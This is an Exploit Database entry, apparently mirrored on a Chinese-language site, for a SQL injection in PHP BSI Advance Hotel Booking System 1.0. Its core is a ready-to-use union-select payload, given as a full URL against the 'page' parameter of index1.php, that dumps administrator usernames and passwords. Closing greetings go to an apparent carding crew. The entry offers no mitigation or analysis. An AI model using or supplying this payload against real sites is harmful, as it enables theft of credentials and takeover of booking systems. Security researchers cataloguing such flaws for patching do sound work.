BSI Advance Hotel Booking System 1.0 – SQL Injection

• Exploit Database
• 10 阅读

• 作者： v3n0m
  日期： 2010-11-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15531/

• -----------------------------------------------------------------------
  PHP BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability
  -----------------------------------------------------------------------
  Author	: v3n0m
  Site	: http://yogyacarderlink.web.id/
  Date		: November, 14-2010
  Location	: Jakarta, Indonesia
  Time Zone	: GMT +7:00
  Application	: PHP BSI Advance Hotel Booking System
  Version		: 1.0
  Vendor	: http://www.bestsoftinc.com/
  
  Exploit & p0c
  _____________
  
  -9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--
  
  http://127.0.0.1/[path]/index1.php?page=[SQLi]
  http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--
  
  ShoutZ
  ______
  
  All YOGYACARDERLINK CREW, GheMaX, LeQhi
  Also Jovita & Fabian :)